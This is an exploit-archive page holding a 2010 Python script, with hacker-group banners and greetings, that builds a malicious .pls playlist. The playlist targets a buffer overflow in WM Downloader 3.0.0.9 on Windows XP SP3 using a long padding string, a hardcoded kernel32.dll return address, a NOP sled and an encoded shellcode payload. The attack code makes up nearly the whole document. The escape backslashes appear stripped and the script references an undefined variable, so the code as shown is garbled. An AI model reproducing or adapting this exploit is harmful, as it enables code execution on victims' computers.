[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WM Downloader v3.0.0.9 PLS PLA Exploit (WinXP SP3)
# Published : 2010-02-10
# Author : Beenu Arora
# Previous Title : Radasm .rap file local buffer overflow vulnerability
# Next Title : LDAP Injection POC
#!/usr/bin/python
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# Greetz to all Darkc0de ,AI,ICW Memebers
#Shoutz to r45c4l,j4ckh4x0r,silic0n,smith,baltazar,d3hydr8,FB1H2S, lowlz,Eberly,Sumit,zerocode,dalsim,7, Anirban , Anas, Navneet ,
# Greetings to PwC India
import sys,os
print "n|---------------------------------------------------------------|"
print "| beenudel1986[@]gmail[dot]com |"
print "| Do Visit www.BeenuArora.com |"
print "|---------------------------------------------------------------|n"
file=open('exploit.pls','w')
test1="x41"*26081
test2="x13x44x87x7c" #kernel32.dll 0x7C874413
test3="x90"*30
test4=("xdbxc0x31xc9xbfx7cx16x70xccxd9x74x24xf4xb1"
"x1ex58x31x78x18x83xe8xfcx03x78x68xf4x85x30"
"x78xbcx65xc9x78xb6x23xf5xf3xb4xaex7dx02xaa"
"x3ax32x1cxbfx62xedx1dx54xd5x66x29x21xe7x96"
"x60xf5x71xcax06x35xf5x14xc7x7cxfbx1bx05x6b"
"xf0x27xddx48xfdx22x38x1bxa2xe8xc3xf7x3bx7a"
"xcfx4cx4fx23xd3x53xa4x57xf7xd8x3bx83x8ex83"
"x1fx57x53x64x51xa1x33xcdxf5xc6xf5xc1x7ex98"
"xf5xaaxf1x05xa8x26x99x3dx3bxc0xd9xfex51x61"
"xb6x0ex2fx85x19x87xb7x78x2fx59x90x7bxd7x05"
"x7fxe8x7bxca")
test=test1+test2+test3+test4
file.write(test)
print "n Test File Creatednn"
print shell
raw_input()
file.close()